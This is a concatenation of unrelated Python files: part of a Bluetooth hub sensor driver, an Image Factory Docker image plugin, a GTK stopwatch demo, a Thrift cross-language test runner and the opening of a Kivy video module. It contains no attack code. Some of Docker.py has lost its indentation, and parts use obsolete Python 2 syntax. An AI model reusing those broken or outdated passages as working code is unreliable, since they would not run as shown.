            v["basic_color"] = VISION_SENSOR_COLOR_DECODE[v["basic_color"]]
        if "rgb_color" in v:
            rgb = v["rgb_color"]
            v["rgb_color"] = {"red": rgb[0], "green": rgb[1], "blue": rgb[2]}

    def set_mode(self, m):
        """Switch sensor mode, by index or name from VISION_SENSOR_MODES."""
        if type(m) == str:
            m = VISION_SENSOR_MODES.index(m)
        if m != self._md:
            self._md = m
            # dataset count and width vary by mode (rgb has 3 datasets;
            # count mode is 32-bit, color_o/rgb_color are 16-bit)
            n_ds = 3 if m == 6 else 1
            ds_sz = 4 if m == 2 else (2 if m in [6, 7] else 1)
            self._setup_caps_wr([(m, VISION_SENSOR_MODES[m], 1, n_ds, ds_sz)])
class RGBLed(HubDriver):
    """Hub RGB status LED; accepts palette colors or raw RGB triples."""
    _id = 0x17

    def __init__(self, h, p):
        super().__init__(h, p, type(self)._id)
        self._md = 0  # 0 = preset-color mode, 1 = raw-rgb mode
        self._setup_caps_wr([(0, "preset_color", 0, 0, 0)])

    def _parse_value(self):
        # the LED is write-only; nothing to decode
        pass

    def set_color(self, c):
        """Set the LED: a name or palette index, or an [r, g, b] list."""
        if type(c) == str:
            c = RGB_LED_COLORS.index(c.lower())
        if type(c) == int:
            if self._md == 1:
                # switch the port back to preset-color mode first
                self._setup_caps_wr([(0, "preset_color", 0, 0, 0)])
                self.h._send([0x00, 0x41, self.p, 0x00, 0, 0, 0, 0, 0])
                self._md = 0
            self.h._send([0x00, 0x81, self.p, 0x11, 0x51, 0x00, c])
        else:
            if self._md == 0:
                # switch the port into raw-rgb mode first
                self._setup_caps_wr([(1, "rgb_color", 0, 0, 0)])
                self._md = 1
            self.h._send([0x00, 0x81, self.p, 0x11, 0x51, 0x01] + c)
class GyroSensor(HubDriver):
    # Hub IMU gyro (0x3a). Raw readings wrap modulo 2**16; this driver
    # accumulates a per-axis offset so large jumps fold into running
    # roll/pitch/yaw totals exposed via self.value["gyro"].
    _id=0x3a
    def __init__(self,h,p):
        super().__init__(h,p,self.__class__._id)
        self._setup_caps_wr([(0,"gyro",1,3,2)])
        self._ld_tm=-1   # time of last reading (-1 = none yet)
        self._l_dt=[None]*3   # last re-centered raw value per axis
        self._off=[0]*3       # accumulated offset per axis
        self._off_l=[None]*3  # NOTE(review): written nowhere else; appears unused
        self._g_dt={GYRO_SENSOR_VALUES[i]:0 for i in range(0,3)}
    def _parse_value(self):
        tm=time.time()
        if (self._ld_tm==-1):
            self._ld_tm=tm+0
        self._ld_tm=tm+0
        for i in range(3):
            # re-center the raw 16-bit reading into [-2**15, 2**15)
            v=(self.value["gyro"][i]+2**15)%2**16-2**15
            # NOTE(review): indentation reconstructed from flattened
            # source; _l_dt appears to update only on jumps >= 25 (and
            # on first reading) -- confirm against original layout
            if (self._l_dt[i]!=None and abs(v-self._l_dt[i])>=25):
                # fold the scaled delta (2 decimal places) into the offset
                self._off[i]+=int((v-self._l_dt[i])/655.36*100)/100
                self._l_dt[i]=v
            if (self._l_dt[i] is None):
                self._l_dt[i]=v
            self._g_dt[GYRO_SENSOR_VALUES[i]]+=self._off[i]+0
        self.value={"gyro":self._g_dt}
class TemperatureSensor(HubDriver):
    """Hub internal temperature sensor; raw value is tenths of a degree."""
    _id = 0x3c

    def __init__(self, h, p):
        super().__init__(h, p, type(self)._id)
        self._setup_caps_wr([(0, "temperature", 1, 1, 2)])

    def _parse_value(self):
        # convert tenths of a degree to degrees
        self.value["temperature"] = self.value["temperature"] / 10
class BatteryCurrent(HubDriver):
    """Hub battery current sensor; raw 16-bit value, no post-processing."""
    _id = 0x15

    def __init__(self, h, p):
        super().__init__(h, p, type(self)._id)
        self._setup_caps_wr([(0, "current", 1, 1, 2)])

    def _parse_value(self):
        pass  # raw value used as-is
class BatteryVoltage(HubDriver):
    """Hub battery voltage sensor; raw 16-bit value, no post-processing."""
    _id = 0x14

    def __init__(self, h, p):
        super().__init__(h, p, type(self)._id)
        self._setup_caps_wr([(0, "voltage", 1, 1, 2)])

    def _parse_value(self):
        pass  # raw value used as-is
class AccelerometerSensor(HubDriver):
    """Hub IMU accelerometer; axes exposed in x/z/y order."""
    _id = 0x39

    def __init__(self, h, p):
        super().__init__(h, p, type(self)._id)
        self._setup_caps_wr([(0, "acceleration", 1, 3, 2)])

    def _parse_value(self):
        # scale raw 16-bit counts and wrap into the [-50, 50) band
        scaled = {
            ACCELEROMETER_SENSOR_VALUES[i]:
                (self.value["acceleration"][i] / 655.36 + 50) % 100 - 50
            for i in range(3)
        }
        self.value = {"acceleration": scaled}
class PositionSensor(HubDriver):
    """Hub IMU orientation; per-axis value wrapped into [-128, 127)."""
    _id = 0x3b

    def __init__(self, h, p):
        super().__init__(h, p, type(self)._id)
        self._setup_caps_wr([(0, "position", 1, 3, 2)])

    def _parse_value(self):
        wrapped = {
            i: (self.value["position"][i] / 255 + 128) % 255 - 128
            for i in range(3)
        }
        self.value = {"position": wrapped}
class GestureSensor(HubDriver):
    """Hub IMU gesture events; raw event code, no post-processing."""
    _id = 0x36

    def __init__(self, h, p):
        super().__init__(h, p, type(self)._id)
        self._setup_caps_wr([(0, "gesture", 1, 1, 1)])

    def _parse_value(self):
        pass  # raw gesture code used as-is
|
Docker.py | #!/usr/bin/python
#
# Copyright 2014 Red Hat, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import zope
import libxml2
import json
import os
import os.path
import struct
import subprocess
import datetime
import random
import shutil
import oz.TDL
import tempfile
import tarfile
import threading
import subprocess
from xml.etree.ElementTree import fromstring
from imgfac.Template import Template
from imgfac.ApplicationConfiguration import ApplicationConfiguration
from imgfac.BuildDispatcher import BuildDispatcher
from imgfac.ImageFactoryException import ImageFactoryException
from imgfac.CloudDelegate import CloudDelegate
from imgfac.FactoryUtils import launch_inspect_and_mount, shutdown_and_close, remove_net_persist, create_cloud_info, parameter_cast_to_bool
class Docker(object):
zope.interface.implements(CloudDelegate)
compress_commands = { "xz": "xz -T 0 --stdout %s > %s",
"gzip": "gzip -c %s > %s",
"bzip2": "bzip2 -c %s > %s" }
# The templates below allow us to generate base images without a running docker locally
# imcleod@redhat.com - 26-Aug-2014
# We know of at least two different output JSON formats. These relate to some JSON marshaling
# changes in the docker 1.0.0 timeframe. At the time of this comment, the upstream registry will
# only accept the older 0.11.1 format which is what we default to.
# Note that there is a separate "VERSION" file in each subdirectory. As of this comment
# that file always contains 1.0
# TODO: Get rid of these silly string templates and just use the json module and dicts
#
# vbatts pointed out that creating these as string templates is kind of silly
# since we can just build them up as nested dicts and use json tools to create
# the required strings. I originally used strings to ensure absolute fidelity to
# the observed docker output, but there's no real technical reason to do this
docker_json_template_0_11_1 = """{{
"id": "{idstring}",
"comment": "{commentstring}",
"created": "{createdtime}",
"container_config": {{
"Cmd": {cmd},
"Env": {env},
"Label": {label},
"StdinOnce": false,
"OpenStdin": false,
"Tty": false,
"ExposedPorts": null,
"AttachStdin": false,
"AttachStdout": false,
"Image": "",
"Volumes": null,
"WorkingDir": "",
"Entrypoint": null,
"NetworkDisabled": false,
"OnBuild": null,
"CpuShares": 0,
"MemorySwap": 0,
"Memory": 0,
"User": "",
"Domainname": "",
"Hostname": "",
"AttachStderr": false,
"PortSpecs": null
}},
"docker_version": "0.11.1",
"architecture": "{arch}",
"os": "{os}",
"Size": {size}
}}"""
docker_json_template_1_0_0 = """{{
"Comment": "{commentstring}",
"Container": "",
"DockerVersion": "1.0.0",
"Parent": "",
"Author": "",
"Os": "{os}",
"Created": "{createdtime}",
"Architecture": "{arch}",
"ContainerConfig": {{
"MemorySwap": 0,
"Hostname": "",
"Entrypoint": null,
"PortSpecs": null,
"Memory": 0,
"OnBuild": null,
"OpenStdin": false,
"Cpuset": "",
"Env": {env},
"User": "",
"CpuShares": 0,
"AttachStdout": false,
"NetworkDisabled": false,
"WorkingDir": "",
"Cmd": {cmd},
"Label": {label},
"StdinOnce": false,
"AttachStdin": false,
"Volumes": null,
"Tty": false,
"AttachStderr": false,
"Domainname": "",
"Image": "",
"ExposedPorts": null
}},
"Config": null,
"Id": "{idstring}",
"Size": {size}
}}
"""
docker_templates_dict = { "0.11.1": docker_json_template_0_11_1,
"1.0.0": docker_json_template_1_0_0 }
def __init__(self):
    # Load the factory-wide configuration and create a logger namespaced
    # as "<module>.Docker".
    super(Docker, self).__init__()
    self.app_config = ApplicationConfiguration().configuration
    self.log = logging.getLogger('%s.%s' % (__name__, self.__class__.__name__))
def activity(self, activity):
    '''Record one line of human-readable build progress.

    Logged at DEBUG and mirrored into the active image's
    status_detail['activity'] so clients can observe progress.
    '''
    # Simple helper function
    # Activity should be a one line human-readable string indicating the task in progress
    # We log it at DEBUG and also set it as the status_detail on our active image
    self.log.debug(activity)
    self.active_image.status_detail['activity'] = activity
def push_image_to_provider(self, builder, provider, credentials, target, target_image, parameters):
    # Docker images are built locally; pushing to a provider/registry
    # is intentionally unsupported by this plugin.
    raise ImageFactoryException("Pushing not currently supported for Docker image builds")
def snapshot_image_on_provider(self, builder, provider, credentials, template, parameters):
    # TODO: Implement snapshot builds
    raise ImageFactoryException("Snapshot builds not currently supported for Docker")
def _generate_docker_id(self):
# return a random 64 digit hex number
did = ""
for i in range(8):
did += "%08x" % (random.randint(0, 2 ** 32))
return did
    def builder_should_create_target_image(self, builder, target, image_id, template, parameters):
        """Build the complete Docker target image here and halt the normal pipeline.

        The x86_64 base image is mounted locally via libguestfs/FUSE, tarred
        into builder.target_image.data, optionally wrapped in Docker
        repository metadata (repositories/json/VERSION/layer.tar inside an
        outer tar), and optionally compressed.  Always returns False so the
        framework skips the regular create-target-image step.
        """
        self.log.debug("builder_should_create_target_image called for Docker plugin - doing all our work here then stopping the process")
        tdlobj = oz.TDL.TDL(xmlstring=template.xml, rootpw_required=self.app_config["tdl_require_root_pw"])
        if tdlobj.arch != "x86_64":
            raise Exception("Docker plugin currently supports only x86_64 images")
        # At this point our input base_image is available as builder.base_image.data
        # We simply mount it up in libguestfs and tar out the results as builder.target_image.data
        wrap_metadata = parameter_cast_to_bool(parameters.get('create_docker_metadata', True))
        compress_type = parameters.get('compress', None)
        if compress_type:
            if compress_type in self.compress_commands.keys():
                compress_command = self.compress_commands[compress_type]
            else:
                raise Exception("Passed unknown compression type (%s) for Docker plugin" % (compress_type))
        else:
            compress_command = None
        guestfs_handle = launch_inspect_and_mount(builder.base_image.data, readonly = True)
        storagedir = os.path.dirname(builder.target_image.data)
        # guestfs lets us mount locally via the API, which is cool, but requires that
        # we call a blocking function to activate the mount, which requires a thread
        # We also need a temp dir to mount it to - do our best to clean up when things
        # go wrong
        tempdir = None
        fuse_thread = None
        try:
            tempdir = tempfile.mkdtemp(dir=storagedir)
            self.log.debug("Mounting input image locally at (%s)" % (tempdir))
            guestfs_handle.mount_local(tempdir)
            def _run_guestmount(g):
                # Blocking FUSE service loop; must run on its own thread.
                g.mount_local_run()
            self.log.debug("Launching mount_local_run thread")
            fuse_thread = threading.Thread(group=None, target=_run_guestmount, args=(guestfs_handle,))
            fuse_thread.start()
            self.log.debug("Creating tar of entire image")
            # Use acls and xattrs to ensure SELinux data is not lost
            # Use --sparse to avoid exploding large empty files from input image
            tarcmd = [ 'tar', '-cf', builder.target_image.data, '-C', tempdir, '--sparse', '--acls', '--xattrs', './' ]
            subprocess.check_call(tarcmd)
            if wrap_metadata:
                self.log.debug("Estimating size of tar contents to include in Docker metadata")
                # Sum regular (non-symlink) file sizes; used for the "Size"
                # field in the Docker JSON metadata below.
                size = 0
                for root, dirs, files in os.walk(tempdir):
                    for name in files:
                        fp = os.path.join(root,name)
                        if os.path.isfile(fp) and not os.path.islink(fp):
                            size += os.path.getsize(fp)
                self.log.debug("Total real file content size (%d)" % (size))
        except Exception, e:
            self.log.exception(e)
            raise
        finally:
            # Best-effort teardown of the FUSE mount and its temp dir.
            if tempdir:
                try:
                    subprocess.check_call( ['umount', '-f', tempdir] )
                    os.rmdir(tempdir)
                except Exception, e:
                    self.log.exception(e)
                    self.log.error("WARNING: Could not unmount guest at (%s) - may still be mounted" % (tempdir) )
            if fuse_thread:
                fuse_thread.join(30.0)
                # NOTE(review): isAlive() is the Python 2 spelling; it was
                # removed in Python 3.9 in favour of is_alive().
                if fuse_thread.isAlive():
                    self.log.error("Guestfs local mount thread is still active - FUSE filesystem still mounted at (%s)" % (tempdir) )
        if wrap_metadata:
            # Get any parameters and if they are not set, create our defaults
            repository = parameters.get('repository',tdlobj.name)
            tag = parameters.get('tag','latest')
            docker_image_id = parameters.get('docker_image_id', self._generate_docker_id())
            # cmd/env/label default to the JSON literal "null" inside the template
            cmd = parameters.get('docker_cmd', 'null')
            env = parameters.get('docker_env', 'null')
            label = parameters.get('docker_label', 'null')
            rdict = { repository: { tag: docker_image_id } }
            dockerversion = parameters.get('dockerversion', '0.11.1')
            if not dockerversion in self.docker_templates_dict:
                raise Exception("No docker JSON template available for specified docker version (%s)" % (dockerversion))
            docker_json_template=self.docker_templates_dict[dockerversion]
            tdict = { }
            tdict['commentstring'] = parameters.get('comment', 'Created by Image Factory')
            tdict['os'] = parameters.get('os', 'linux')
            tdict['createdtime'] = datetime.datetime.utcnow().strftime('%Y-%m-%dT%H:%M:%SZ')
            tdict['arch'] = "amd64"
            tdict['idstring'] = docker_image_id
            tdict['cmd'] = cmd
            tdict['env'] = env
            tdict['label'] = label
            tdict['size'] = size
            image_json = docker_json_template.format(**tdict)
            # Create directory
            storagedir = os.path.dirname(builder.target_image.data)
            tempdir = None
            try:
                tempdir = tempfile.mkdtemp(dir=storagedir)
                self.log.debug("Creating docker image directory structure in (%s)" % (tempdir))
                repositories_path = os.path.join(tempdir,'repositories')
                repositories = open(repositories_path,"w")
                json.dump(rdict, repositories)
                repositories.close()
                imagedir = os.path.join(tempdir, docker_image_id)
                os.mkdir(imagedir)
                jsonfile_path = os.path.join(imagedir,'json')
                jsonfile = open(jsonfile_path,'w')
                jsonfile.write(image_json)
                jsonfile.close()
                versionfile_path = os.path.join(imagedir,'VERSION')
                versionfile = open(versionfile_path, 'w')
                # TODO - Track version developments and compatibility
                versionfile.write("1.0")
                versionfile.close()
                layerfile_path = os.path.join(imagedir,'layer.tar')
                # The plain tar created above becomes the single layer; the
                # outer archive is rebuilt at the same path below.
                shutil.move(builder.target_image.data, layerfile_path)
                outtar = tarfile.TarFile(name=builder.target_image.data, mode="w")
                # It turns out that in at least some configurations or versions, Docker will
                # complain if the repositories file is not the last file in the archive
                # we add our single image directory first and then the repositories file to
                # avoid this
                outtar.add(imagedir, arcname=docker_image_id)
                outtar.add(repositories_path, arcname='repositories')
                outtar.close()
            finally:
                if tempdir:
                    try:
                        shutil.rmtree(tempdir)
                    except:
                        self.log.warning("Error encountered when removing temp dir (%s) - may not have been deleted" % (tempdir))
        if compress_command:
            self.log.debug("Compressing tar file using %s" % (compress_type))
            rawimage = builder.target_image.data
            compimage = builder.target_image.data + ".tmp.%s" % (compress_type)
            result = subprocess.call(compress_command % ( rawimage, compimage), shell = True)
            if result:
                raise Exception("Compression of image failed")
            self.log.debug("Compression complete, replacing original")
            os.unlink(rawimage)
            os.rename(compimage, rawimage)
        self.log.debug("Done")
        # False tells the framework not to proceed with the normal build.
        return False
    def builder_will_create_target_image(self, builder, target, image_id, template, parameters):
        """Never reached: builder_should_create_target_image() always returns False."""
        raise ImageFactoryException("builder_will_create_target_image called in Docker plugin - this should never happen")
    def builder_did_create_target_image(self, builder, target, image_id, template, parameters):
        """Never reached: builder_should_create_target_image() always returns False."""
        raise ImageFactoryException("builder_did_create_target_image called in Docker plugin - this should never happen")
|
threadtest3.py | #!/usr/bin/python3
import gi
gi.require_version('Gtk', '3.0')
from gi.repository import Gtk,Pango,GObject
import threading
import datetime
import time
class MyWindow(Gtk.Window):
    """Simple stopwatch window: Start/Stop buttons above a large clock label."""

    def __init__(self):
        self.timer = None   # background thread ticking the clock
        self.event = None   # threading.Event that stops the tick loop
        self.clock = '00:00:00'
        Gtk.Window.__init__(self, title="Timer")
        self.set_default_size(800, 450)
        self.button_start = Gtk.Button(label="Start")
        self.button_start.connect("clicked", self.start_timer)
        self.button_stop = Gtk.Button(label="Stop")
        self.button_stop.connect("clicked", self.stop_timer)
        self.status = Gtk.Label()
        self.status.set_text(self.clock)
        # override_font is deprecated but good enough for a preview.
        font = Pango.FontDescription("Tahoma 48")
        self.status.override_font(font)
        self.vbox = Gtk.VBox()
        self.vbox.pack_start(self.button_start, False, False, 5)
        self.vbox.pack_start(self.button_stop, False, False, 5)
        self.vbox.pack_end(self.status, True, True, 5)
        self.add(self.vbox)

    def get_time(self):
        """Worker-thread loop: count elapsed seconds until the event is set."""
        seconds = 0
        while not self.event.is_set():
            seconds += 1
            self.clock = str(datetime.timedelta(seconds=seconds))
            # BUG FIX: GTK widgets are not thread-safe; updating the label
            # directly from this worker thread can crash or corrupt the UI.
            # Schedule the update onto the GTK main loop instead.
            GObject.idle_add(self.status.set_text, self.clock)
            time.sleep(1)

    def start_timer(self, button):
        print('start')
        # BUG FIX: pressing Start repeatedly used to spawn a second ticking
        # thread alongside the first; ignore clicks while one is running.
        if self.timer is not None and self.timer.is_alive():
            return
        self.event = threading.Event()
        self.timer = threading.Thread(target=self.get_time)
        self.timer.daemon = True
        self.timer.start()

    def stop_timer(self, button):
        print('stop')
        # BUG FIX: pressing Stop before Start used to raise AttributeError
        # because self.event was still None.
        if self.event is not None:
            self.event.set()  # stops loop in get_time
        self.timer = None     # disposes of timer thread
# Build the window, wire window-close to quitting, and enter the GTK main loop.
win = MyWindow()
win.connect("destroy", Gtk.main_quit)
win.show_all()
Gtk.main()
test.py | #!/usr/bin/env python
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
from __future__ import division
import time
import socket
import subprocess
import sys
import os
import signal
import json
import platform
import shutil
import threading
from optparse import OptionParser
# Command-line options for the cross-language test runner.
# verbose levels: 0 = quiet, 1 = default, 2 = verbose.
parser = OptionParser()
parser.add_option("--port", type="int", dest="port", default=9090,
                  help="port number for server to listen on")
parser.add_option('-v', '--verbose', action="store_const",
                  dest="verbose", const=2,
                  help="verbose output")
parser.add_option('-q', '--quiet', action="store_const",
                  dest="verbose", const=0,
                  help="minimal output")
parser.set_defaults(verbose=1)
options, args = parser.parse_args()
def relfile(fname):
    """Resolve *fname* relative to the directory containing this script."""
    script_dir = os.path.dirname(__file__)
    return os.path.join(script_dir, fname)
def getSocketArgs(socket_type):
    """Map a socket type name to the extra command-line flag it requires.

    Known types: 'ip' (no flag), 'ip-ssl' (--ssl), 'domain'
    (--domain-socket=...).  Unknown types yield an empty string; the
    original fell off the end and returned None, which rendered as the
    literal text "None" when interpolated into the diagnostic messages
    printed by the main loop.
    """
    flags = {
        'ip': "",
        'ip-ssl': "--ssl",
        'domain': "--domain-socket=/tmp/ThriftTest.thrift",
    }
    return flags.get(socket_type, "")
def runServiceTest(test_name, server_lib, server_executable, server_extra_args, client_lib, client_executable, client_extra_args, server_protocol, client_protocol, transport, port, use_zlib, socket_type):
    # Start one server, run one client against it, and report the outcome.
    # Returns None on success or a human-readable error string on failure.
    # stdout/stderr of both processes go to log/<test_name>_{server,client}.log.
    # Build command line arguments
    server_args = []
    cli_args = []
    # Java executables arrive as an argv list whose third element is a path
    # to resolve; the quote tokens bracket the -Dtestargs value.
    if server_lib == 'java':
        server_executable[2] = relfile(server_executable[2])
        server_args.extend(server_executable)
        server_args.extend(['-Dtestargs','\"'])
    else:
        server_args = [relfile(server_executable)]
    if client_lib == 'java':
        client_executable[2] = relfile(client_executable[2])
        cli_args.extend(client_executable)
        cli_args.extend(['-Dtestargs','\"'])
    else:
        cli_args = [relfile(client_executable)]
    server_args.append('--protocol=%s' % server_protocol)
    cli_args.append('--protocol=%s' % client_protocol)
    # Options shared by both the server and client command lines.
    for which in (server_args, cli_args):
        which.append('--transport=%s' % transport)
        which.append('--port=%d' % port) # default to 9090
        if use_zlib:
            which.append('--zlib')
        if socket_type == 'ip-ssl':
            which.append('--ssl')
        elif socket_type == 'domain':
            which.append('--domain-socket=/tmp/ThriftTest.thrift')
        # if options.verbose == 0:
        #   which.append('-q')
        # if options.verbose == 2:
        #   which.append('-v')
    if server_lib == 'java':
        server_args.append('\"')
    if client_lib == 'java':
        cli_args.append('\"')
    server_args.extend(server_extra_args)
    cli_args.extend(client_extra_args)
    server_log=open("log/" + test_name + "_server.log","a")
    client_log=open("log/" + test_name + "_client.log","a")
    try:
        if options.verbose > 0:
            print 'Testing server: %s' % (' '.join(server_args))
            serverproc = subprocess.Popen(server_args, stdout=server_log, stderr=server_log)
        else:
            serverproc = subprocess.Popen(server_args, stdout=server_log, stderr=server_log)
    except OSError as e:
        return "OS error({0}): {1}".format(e.errno, e.strerror)
    def ensureServerAlive():
        # NOTE(review): callers below discard this return value, so a dead
        # server is never actually reported from the wait loop — confirm intent.
        if serverproc.poll() is not None:
            return 'Server subprocess died, args: %s' % (' '.join(server_args))
    # Wait for the server to start accepting connections on the given port.
    sock = socket.socket()
    sleep_time = 0.1 # Seconds
    max_attempts = 100
    try:
        attempt = 0
        if socket_type != 'domain':
            while sock.connect_ex(('127.0.0.1', port)) != 0:
                attempt += 1
                if attempt >= max_attempts:
                    return "TestServer not ready on port %d after %.2f seconds" % (port, sleep_time * attempt)
                ensureServerAlive()
                time.sleep(sleep_time)
    finally:
        sock.close()
    try:
        o = []
        def target():
            # Runs the client on a helper thread so a 10-second timeout can
            # be enforced via thread.join() below.
            # NOTE(review): return values of a Thread target are discarded,
            # so the error strings returned here are never seen by anyone.
            try:
                if options.verbose > 0:
                    print 'Testing client: %s' % (' '.join(cli_args))
                    process = subprocess.Popen(cli_args, stdout=client_log, stderr=client_log)
                    o.append(process)
                    process.communicate()
                else:
                    process = subprocess.Popen(cli_args, stdout=client_log, stderr=client_log)
                    o.append(process)
                    process.communicate()
            except OSError as e:
                return "OS error({0}): {1}".format(e.errno, e.strerror)
            except:
                return "Unexpected error:", sys.exc_info()[0]
        thread = threading.Thread(target=target)
        thread.start()
        thread.join(10)
        if thread.is_alive():
            # Client exceeded its 10 second budget; kill it.
            print 'Terminating process'
            o[0].terminate()
            thread.join()
        if(len(o)==0):
            return "Client subprocess failed, args: %s" % (' '.join(cli_args))
        ret = o[0].returncode
        if ret != 0:
            return "Client subprocess failed, retcode=%d, args: %s" % (ret, ' '.join(cli_args))
            #raise Exception("Client subprocess failed, retcode=%d, args: %s" % (ret, ' '.join(cli_args)))
    finally:
        # check that server didn't die
        #ensureServerAlive()
        extra_sleep = 0
        if extra_sleep > 0 and options.verbose > 0:
            print ('Giving (protocol=%s,zlib=%s,ssl=%s) an extra %d seconds for child'
                   'processes to terminate via alarm'
                   % (protocol, use_zlib, use_ssl, extra_sleep))
            time.sleep(extra_sleep)
        # Always tear the server down and flush/close both log files.
        os.kill(serverproc.pid, signal.SIGKILL)
        serverproc.wait()
        client_log.flush()
        server_log.flush()
        client_log.close()
        server_log.close()
# ---------------------------------------------------------------------------
# Main driver: cross every server in tests.json against every compatible
# client, run each pairing through runServiceTest, and record each result
# as a JSON array entry in results.json.
# ---------------------------------------------------------------------------
test_count = 0
failed = 0
# NOTE(review): this rebinds the imported `platform` module's name to a
# string; any later platform.* call would fail — confirm this is intentional.
platform = platform.system()
if os.path.exists('log'): shutil.rmtree('log')
os.makedirs('log')
if os.path.exists('results.json'): os.remove('results.json')
results_json = open("results.json","a")
results_json.write("[\n")
with open('tests.json') as data_file:
    data = json.load(data_file)
#subprocess.call("export NODE_PATH=../lib/nodejs/test:../lib/nodejs/lib:${NODE_PATH}")
# count is used only to decide whether a comma separator is needed before
# the next results.json entry.
count = 0
for server in data["server"]:
    server_executable = server["executable"]
    server_extra_args = ""
    server_lib = server["lib"]
    if "extra_args" in server:
        server_extra_args = server["extra_args"]
    for protocol in server["protocols"]:
        for transport in server["transports"]:
            for sock in server["sockets"]:
                for client in data["client"]:
                    # Only pair implementations that both support this host OS.
                    if platform in server["platform"] and platform in client["platform"]:
                        client_executable = client["executable"]
                        client_extra_args = ""
                        client_lib = client["lib"]
                        if "extra_args" in client:
                            client_extra_args = client["extra_args"]
                        # Case 1: exact protocol match between server and client.
                        if protocol in client["protocols"]:
                            if transport in client["transports"]:
                                if sock in client["sockets"]:
                                    if count != 0:
                                        results_json.write(",\n")
                                    count = 1
                                    results_json.write("\t[\n\t\t\"" + server_lib + "\",\n\t\t\"" + client_lib + "\",\n\t\t\"" + protocol + "\",\n\t\t\"" + transport + "-" + sock + "\",\n" )
                                    test_name = server_lib + "_" + client_lib + "_" + protocol + "_" + transport + "_" + sock
                                    ret = runServiceTest(test_name, server_lib, server_executable, server_extra_args, client_lib, client_executable, client_extra_args, protocol, protocol, transport, 9090, 0, sock)
                                    if ret != None:
                                        failed += 1
                                        print "Error: %s" % ret
                                        print "Using"
                                        print (' Server: %s --protocol=%s --transport=%s %s %s'
                                               % (server_executable, protocol, transport, getSocketArgs(sock), ' '.join(server_extra_args)))
                                        print (' Client: %s --protocol=%s --transport=%s %s %s'
                                               % (client_executable, protocol, transport, getSocketArgs(sock), ''.join(client_extra_args)))
                                        results_json.write("\t\t\"failure\",\n")
                                    else:
                                        results_json.write("\t\t\"success\",\n")
                                    results_json.write("\t\t{\n\t\t\t\"Client\":\"log/" + test_name + "_client.log\",\n\t\t\t\"Server\":\"log/" + test_name + "_server.log\"\n\t\t}\n\t]")
                                    test_count += 1
                        # Case 2: binary server against an accelerated client.
                        if protocol == 'binary' and 'accel' in client["protocols"]:
                            if transport in client["transports"]:
                                if sock in client["sockets"]:
                                    if count != 0:
                                        results_json.write(",\n")
                                    count = 1
                                    results_json.write("\t[\n\t\t\"" + server_lib + "\",\n\t\t\"" + client_lib + "\",\n\t\t\"accel-binary\",\n\t\t\"" + transport + "-" + sock + "\",\n" )
                                    test_name = server_lib + "_" + client_lib + "_accel-binary_" + transport + "_" + sock
                                    ret = runServiceTest(test_name, server_lib,server_executable, server_extra_args, client_lib, client_executable, client_extra_args, protocol, 'accel', transport, 9090, 0, sock)
                                    if ret != None:
                                        failed += 1
                                        print "Error: %s" % ret
                                        print "Using"
                                        print (' Server: %s --protocol=%s --transport=%s %s %s'
                                               % (server_executable, protocol, transport, getSocketArgs(sock), ' '.join(server_extra_args)))
                                        print (' Client: %s --protocol=%s --transport=%s %s %s'
                                               % (client_executable, protocol, transport , getSocketArgs(sock), ''.join(client_extra_args)))
                                        results_json.write("\t\t\"failure\",\n")
                                    else:
                                        results_json.write("\t\t\"success\",\n")
                                    results_json.write("\t\t{\n\t\t\t\"Client\":\"log/" + test_name + "_client.log\",\n\t\t\t\"Server\":\"log/" + test_name + "_server.log\"\n\t\t}\n\t]")
                                    test_count += 1
                        # Case 3: accelerated server against a binary client.
                        if protocol == 'accel' and 'binary' in client["protocols"]:
                            if transport in client["transports"]:
                                if sock in client["sockets"]:
                                    if count != 0:
                                        results_json.write(",\n")
                                    count = 1
                                    results_json.write("\t[\n\t\t\"" + server_lib + "\",\n\t\t\"" + client_lib + "\",\n\t\t\"binary-accel\",\n\t\t\"" + transport + "-" + sock + "\",\n" )
                                    test_name = server_lib + "_" + client_lib + "_binary-accel_" + transport + "_" + sock
                                    ret = runServiceTest(test_name, server_lib,server_executable, server_extra_args, client_lib, client_executable, client_extra_args, protocol, 'binary', transport, 9090, 0, sock)
                                    if ret != None:
                                        failed += 1
                                        print "Error: %s" % ret
                                        print "Using"
                                        print (' Server: %s --protocol=%s --transport=%s %s %s'
                                               % (server_executable, protocol, transport + sock, getSocketArgs(sock), ' '.join(server_extra_args)))
                                        print (' Client: %s --protocol=%s --transport=%s %s %s'
                                               % (client_executable, protocol, transport + sock, getSocketArgs(sock), ''.join(client_extra_args)))
                                        results_json.write("\t\t\"failure\",\n")
                                    else:
                                        results_json.write("\t\t\"success\",\n")
                                    results_json.write("\t\t{\n\t\t\t\"Client\":\"log/" + test_name + "_client.log\",\n\t\t\t\"Server\":\"log/" + test_name + "_server.log\"\n\t\t}\n\t]")
                                    test_count += 1
results_json.write("\n]")
results_json.flush()
results_json.close()
print '%s failed of %s tests in total' % (failed, test_count)
video_ffpyplayer.py | '''
FFmpeg based video abstraction
==============================
To use, you need to install ffpyplayer and have a compiled ffmpeg shared
library.
https://github.com/matham/ffpyplayer
The docs there describe how to set this up. But briefly, first you need to
compile ffmpeg using the shared flags while disabling the static flags (you'll
probably have to set the fPIC flag, e.g. CFLAGS=-fPIC). Here's some
instructions: https://trac.ffmpeg.org/wiki/CompilationGuide. For Windows, you
can download compiled GPL binaries from http://ffmpeg.zeranoe.com/builds/.
Similarly, you should download SDL.
Now, you should have an ffmpeg and an sdl directory. In each, you should have an include,
bin, and lib directory, where e.g. for Windows, lib contains the .dll.a files,
while bin contains the actual dlls. The include directory holds the headers.
The bin directory is only needed if the shared libraries are not already on
the path. In the environment define FFMPEG_ROOT and SDL_ROOT, each pointing to
the ffmpeg, and SDL directories, respectively. (If you're using SDL2,
